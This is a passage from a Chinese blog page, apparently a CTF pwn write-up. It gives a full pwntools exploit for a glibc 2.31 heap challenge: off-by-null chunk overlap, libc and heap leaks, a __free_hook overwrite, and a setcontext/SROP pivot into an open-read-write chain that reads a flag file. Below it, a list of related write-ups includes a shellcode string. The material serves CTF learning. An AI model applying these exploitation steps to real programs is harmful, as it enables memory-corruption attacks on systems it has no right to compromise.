gadget触发,执行frame,达成read,read读入orw到heap上,然后frame的rsp跳转到orw的地址,执行orw,完成,记得提前布置好flag和frame的位置
 
完整exp:

from pwn import *
from LibcSearcher import * 

local_file  = './main'
local_libc  = '/root/glibc-all-in-one/libs/2.31/libc-2.31.so'
remote_libc = '/root/glibc-all-in-one/libs/2.31/libc-2.31.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32 = [0xcdd7b, 0x14895b, 0x14895c]
o_g = [0xe6d43, 0xe6d46, 0xe6d49]
def debug(cmd=''):
     gdb.attach(r,cmd)
def menu(ch):
    sea('Choice:', str(ch))
def add(size):
    menu(1)
    sea('Size: ', str(size))
def edit(idx, content):
    menu(2)
    sea('Index: ', str(idx))
    sea('Content:', content)
def free(idx):
    menu(3)
    sea('Index: ', str(idx))
def show(idx):
    menu(4)
    sea('Index: ', str(idx))

for i in range(3):
    add(0x1000)# 0-2
add(0xc10) #3
for i in range(7):
    add(0x28) #4-10

add(0xb20) #11
add(0x10) #12
free(11)
#-------------------------------------------------------
add(0x1000)#11
add(0x28)#13
edit(13, p64(0)+p64(0x521)+p8(0x60))
#------------------------fd->bk-------------------------
add(0x28)#14
add(0x28)#15
add(0x28)#16
add(0x28)#17
for i in range(7):
    free(i+4)
free(16)
free(14)
for i in range(7):
    add(0x28)
add(0x400)#14
add(0x28)#16
edit(16, p64(0)+p8(0x40))
#----------------------bk->fd---------------------------
add(0x28)#18
for i in range(7):
    free(i+4)
free(15)
free(13)
for i in range(7):
    add(0x28)
add(0x28)#13
edit(13, p8(0x40))
#------------------------off by null-------------------
add(0x28)#15

add(0x28)#19
add(0x5f8)#20
add(0x100)#21
edit(19, 'a'*0x20+p64(0x520))
free(20)
#---------------------------------------------------------------
add(0x18)
show(16)
libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['__malloc_hook'] - 96 - 0x10
info('libc_base', libc_base)
gadget = libc_base + 0x0000000000154890#mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]; 
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
IO_stdin = libc_base +  libc.sym['_IO_2_1_stdin_']
setcontext = libc_base + libc.sym['setcontext'] + 61
frame_addr = libc_base + libc.sym['_IO_2_1_stdin_'] + 0xe0
str_jumps = libc_base + 0x1ed560
pop_rdi = libc_base + 0x0000000000026b72 # pop rdi ; ret
pop_rsi = libc_base + 0x0000000000027529 # pop rsi ; ret
pop_rdx = libc_base + 0x000000000011c241 # pop rdx ; pop r12 ; ret
pop_rax = libc_base + 0x000000000004a5b0 # pop rax ; ret
syscall = libc_base+libc.search(asm("syscall\nret")).next()
ret = libc_base + 0x0000000000025679 # ret
Open = libc_base + libc.sym['open']
Read = libc_base + libc.sym['read']
Puts = libc_base + libc.sym['puts']
Write = libc_base + libc.sym['write']
#---------------------------------------------------------------
add(0x28)#22
add(0x28)#23
add(0x28)#24
add(0x28)#25
add(0x28)#26
for i in range(7):
    free(i+4)
free(26)
free(25)
for i in range(7):
    add(0x28)
show(17)
rc(9)
heap_addr = uu64(rc(6)) + 0xa60
heap_orw = heap_addr + 0x20
flag = heap_addr - 0xae0
frame_addr = heap_addr - 0x48e0
info('heap_addr', heap_addr)
info('flag', flag)
info('heap_orw', heap_orw)
#----------------------------------------------------------------
add(0x28)#25
add(0x28)#26
for i in range(7):
    free(i+4)
free(22)
for i in range(7):
    add(0x28)
edit(16, p64(free_hook-0x10))
add(0x28)#22
add(0x28)#27
edit(27, p64(gadget))
edit(23, './flag\x00\x00')

frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = heap_orw
frame.rdx = 0x1000
frame.rsp = heap_orw
frame.rip = syscall
str_frame = str(frame)

p = p64(0)*4+p64(setcontext)
edit(0, p+str_frame[0x28:])

p = p64(0) + p64(frame_addr)

p2 = p64(pop_rdi) + p64(flag) + p64(pop_rsi) + p64(0)
p2 += p64(Open)
p2 += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(heap_addr) + p64(pop_rdx) + p64(0x200) + p64(0)
p2 += p64(Read)
p2 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(heap_addr) + p64(pop_rdx) + p64(0x200) + p64(0)
p2 += p64(Write)

edit(11, p)
#debug()
free(11)
sl(p2)
#debug()
#sl('1')

r.interactive()

总结:

总结一下,调试是天

真岛忍
关注
专栏目录
setcontext+orw
「 虚幻私塾」
01-27 805
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 setcontext+orw 大致可以把2.27,2.29做为两个分界点。 我们先来讨论 2.27 及以下的 setcontext + orw 的写法。 首先 setcontext 是什么?了解过 SROP 的师傅应该知道 pwntools 自带了一款可以控制寄存器值的工具。模
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 238
BUUCTF 做题练习
堆上的orw
Stella_Leo的博客
08-24 1638
author: moqizou 堆上的orw 最近出的堆题大都转向了沙箱,需要orw,而在堆上面的orw就需要去布局,如何才能让系统执行我们的代码就成了一个难题,下面是学习的一些总结 libc2.27 这一段是setcontext函数的下面部分,不难发现,通过rdi和偏移,几乎控制了所有的寄存器,所以如果控制setcontext函数的参数也就是rdi就可以控制程序流程,而这里的这样也就可以让堆上的代码可以执行。 一般的套路 一般来说,可以拿到libc_base和heap_base。拿到之后,构造.
pwnable.tw - orw
不急不躁
07-09 3042
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1557
pwnable.tw—orw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
orw (pwnable_orw和[V&N2020 公开赛]warmup)和 picoctf_2018_rop chain 记录笔记
carol2358的博客
05-21 1390
学到一种新的做法,orw(open,read,write),可以用在system,fork syscall(不能打开子进程,需要在当前进程里读入flag并输出) 和execve被禁的情况下打印出flag,还有seccomp 虽然还不太懂,但先记录一下目前的理解 seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。 著作权归作者所有。商业转
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4430
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
BUUCTF:pwnable_orw
qq_44768749的博客
08-27 1676
BUUCTF:pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
orw_shellcode_模板
huzai9527的博客
05-23 1593
orw 64位 shellcode shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" #pwntools context.arch = elf.arch shellcode = asm(shellcreaft.sh()) orw #pwntools shellcode = '' shellcode += shellcraft.open
强网杯2021 [强网先锋]orw
半岛铁盒的博客
06-29 816
orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 因为不是FULL RELRO所以就考虑改got表为shellcode地址就行了 漏洞点就在于以上两点 令index下标为负数时可以覆盖到其他函数的got表地址 这里选择覆盖掉exit的got表中的地址,因为沙盒的存在,所以需要构造orw的shellcode并覆盖exit的got地址为shellcode 覆盖堆块的申请位置选择在这里 计算一下偏移量 起始点 0x
2020YCBCTF:2020羊城杯官方writeup及
03-24
2020年 2020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
0CTF_2016_warmup(alarm在rop中控制eax,orw
m0_51251108的博客
09-20 192
alarm妙用
glibc2.31 off-by-null orw 攻击手法刨析
qq_39948058的博客
08-26 896
前言:复习一下glibc2.31版本的orw手法,largebin的残留信息进行unlik,随便弄个题来写的刨析,嘿嘿, 仅large bin chunk的堆块伪造,并即可实现堆块重叠 并large bin attack 任意写攻击TLS结构体中的存放tcache结构体指针的位置,从而可以伪造tcache bin结构体进行任意构造 再通过上述demo任意写控制参数,从而在assert后即可进行栈迁移 glibc2.31 off-by-null orw 攻击手法刨析 Free(3) 3---->un
2021 强网杯 [强网先锋]orw
z1r0的博客
07-13 526
开了沙盒,利用orw来读flag 没有对index做出限制,可以进行oob。并且当size为0时,可以无限溢出 往heap_ptr的上面找一下,看一下哪个got表可以被轻松利用。 发现了三个常用的got表,因为提供了free功能,所以就直接oob到free的got表,改free为orw即可。 (2020E0 - 0x202018)/ 8 = 25 exp如下...
GO-MAZE-v4(go语言,栈溢出,orw
m0_51251108的博客
09-25 618
浙江省第五届大学生网络与信息安全竞赛决赛的一道pwn
【pwn】orw&rop --泄露libc基址,orw
question55的博客
12-04 250
我们先看看程序的保护的情况因为题目提示了orw,我们可以沙箱检测一下可以发现是禁用的execve函数的,接着看函数逻辑这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:from pwn import *context(os='linux',arch='amd64',log_level='debug
祥云杯2022 pwn - sandboxheap
z1r0的博客
11-02 449
上了sandbox,需要逆一下,在0x2710这里的功能就是允许mport和orw,所以在上面第一次exp的基础上还要再加上一个。下面的exp是笔者第一次直接打sandboxheap的,可以实现orw,然后第二个exp是打题目的,因为题目上了sandbox。这里笔者没有使用SigreturnFrame,直接看的setcontext + 53的汇编然后自己写了一下布局。其实就是一个2.27下的orw,直接拿板子套,直接参考的这位。在上一个heap基础上加了一个沙箱。的2.27下的orw
沙盒orw总结
最新发布
weixin_66751120的博客
02-07 891
一般沙盒机制开启后,会禁掉execve函数,也就意味着one_gadget以及system函数都不能使用,这就需要去利用open/read/write函数来拿到flag,当程序中出现sanbox或者seccomp时就要注意到开启了沙盒机制,这就可以利用seccomp-tools工具去查看什么函数被禁掉了,然后通过一道题的两种构造orw的方式来加深理解。
(BUUCTF)ycb_2020_easy_heap (glibc2.31的off-by-null + orw
xy1458214551的博客
01-14 895
BUUCTF的ycb_2020_easy_heap题解,包含了glibc2.31下的off by null和orw
return orw();
12-19
return orw()是一个函数调用表达式,它会调用名为orw()的函数,并将函数的返回值作为整个表达式的值返回。 在这个表达式中,orw()表示一个被定义的函数。函数调用的一般形式是函数名后跟一对括号,括号中可以包含...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值